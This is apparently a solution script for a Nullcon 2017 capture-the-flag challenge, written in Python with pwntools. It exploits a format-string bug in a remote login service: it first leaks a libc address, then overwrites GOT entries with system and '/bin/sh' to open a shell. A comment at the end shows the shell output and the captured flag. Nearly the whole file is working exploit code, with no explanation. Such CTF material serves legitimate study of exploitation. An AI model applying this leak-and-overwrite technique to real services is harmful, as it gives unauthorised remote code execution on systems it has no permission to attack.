Nullcon_2017-level2.py

from pwn import *

# 0x804b084 [email protected]
# 0x804b018 [email protected]
# 0x804b010 [email protected]

r = remote("34.198.96.6", 9002)
r.recvuntil("Enter name: ")
r.sendline("%8$s")
r.recvuntil("Enter password: ")
r.sendline(p32(0x804b010))
r.recvuntil("Invalid password for username: ")
base_libc = u32(r.recv(4).ljust(4, '\0')) - 0xda1c0
r.close()

p_system = base_libc + 0x3fe70
p_bin_sh = base_libc + 0x15da8c

p_system_hi = (p_system & 0xffff0000) >> 16
p_system_lo = (p_system & 0xffff)
p_bin_sh_hi = (p_bin_sh & 0xffff0000) >> 16
p_bin_sh_lo = (p_bin_sh & 0xffff)

print "base_libc: %x" % base_libc
print "p_system: %x" % p_system
print "p_system_bin_sh: %x" % p_bin_sh

r = remote("34.198.96.6", 9002)
r.recvuntil("Enter name: ")
r.sendline("%" + str(p_system_lo - 31) + "d%8$hn%" + str(p_system_lo - p_system_hi) + "d%9$hn%" + str("17") + "d%10$hn%" + str(p_bin_sh_lo + 2197) + "d%11$hn")
r.recvuntil("Enter password: ")
r.sendline(p32(0x804b018) + p32(0x804b01a) + p32(0x804b086) + p32(0x804b084))
r.interactive()

'''
$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob)
$ cat flag.txt
flag{1nF0L34K4Th3W1n}
'''